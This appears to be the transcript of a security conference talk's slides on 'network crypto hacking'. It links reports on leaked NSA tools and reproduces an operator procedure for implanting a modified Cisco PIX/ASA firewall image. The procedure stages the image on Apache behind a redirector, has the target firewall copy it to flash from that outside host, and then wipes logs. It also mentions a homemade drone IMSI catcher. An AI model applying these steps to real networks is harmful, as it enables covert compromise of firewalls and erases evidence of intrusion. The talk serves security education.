swat style – live network crypto hacking and exploitation by kevin cardwell and wayne burke
TRANSCRIPT
Presenters: Kevin Cardwell & Wayne Burke
Network Crypto Hacking:
http://thehackernews.com/2016/09/xiaomi-android-backdoor.html
https://securelist.com/blog/incidents/75812/the-equation-giveaway/
http://thehackernews.com/2016/08/nsa-hacking-tools.html
http://thehackernews.com/2016/08/nsa-hack-russia-leak.html
http://thehackernews.com/2016/08/nsa-hack-exploit.html
http://thehackernews.com/2016/08/cisco-firewall-hack.html
http://thehackernews.com/2015/10/nsa-crack-encryption.html
Mystery Solved ??
https://twitter.com/SilentSignalHU/status/768095445444861952?ref_src=twsrc%5Etfw
Diving into tactics :
•In the next few slides we will review some detailed real simple tactics.
•The ultimate goal of eventually owning your entire environment.
# Before you even get to the op, you need to create a PIX/ASA IOS image,# key it, and test it. Bring the image and the key to the op.
########## How to get Apache installed on the ops station ############ cd to the Apache tools directorycd /current/bin/FW/Tools/Apache
# Run this first to get the RPM to install without issuerpm -e httpd httpd-suexec mod_ssl apr-util
# Run this next to load apache rpm'srpm -hiv *.rpm
# In this directory is modified versions of the config files
cp httpd.conf /etc/httpd/conf/httpd.confcp ssl.conf /etc/httpd/conf.d/ssl.conf
Apache Implant – Staging your Hack
# Create a test html fileecho "<html><body>This is a test</body></html>" > /var/www/html/index.html
# Put the image file you want to up/download into this directory with a# common name:cp /mnt/zip/<project>.<ip>_bg2011_pix633.bin /var/www/html/pix633.bin
# Set permissions for items in html directorychmod 744 /var/www/html/*
# Start up the apache serverservice httpd start
# Start up your browser to verify it works.# You should get a pop-up asking to verify the ssl cert.# Then you'll get the index.html page which will say "This is a test".firefox https://127.0.0.1:4443 &
# Setup a remote listener on 443 on redirector to hit apache on 4443-tunnelr 443 127.0.0.1 4443
# Now you are ready to go to the target pix and run this commandcopy https://<ip of redirector>:<port if !443>/<name of image file> flash
# Log off of the pixexit
######## Getting Ops Station Back to normal ########## Once the upload is done, stop apacheservice httpd stop
# Remove installed rpm'srpm -e httpd httpd-suexec mod_ssl apr-util
# Then you need to remove any directories still remaining.rm -rf /var/log/httpd /etc/httpd /var/www
#### OTHER INFO ##### To install apache, you need 3 rpm's:# httpd-2.0.52-19.ent.i386.rpm# httpd-suexec-2.0.52-19.ent.i386.rpm# mod_ssl-2.0.52-19.ent.i386.rpm# apr-util-0.9.4-17.i386.rpm
Scripting the implant:
Game: What does a Hacker See …… …… ?
when using a very cheap single board mobile ARM device…
Lets role play
Sample Commercial Products• PWN PLUG V4 Latest - $1,095.00 – Expensive Open Source Support!!
Can we do better for less?
• Our MAK Base 1 or 2:
A flying Heli IMSI Catcher / Stingray Homemade with BladeRF SDR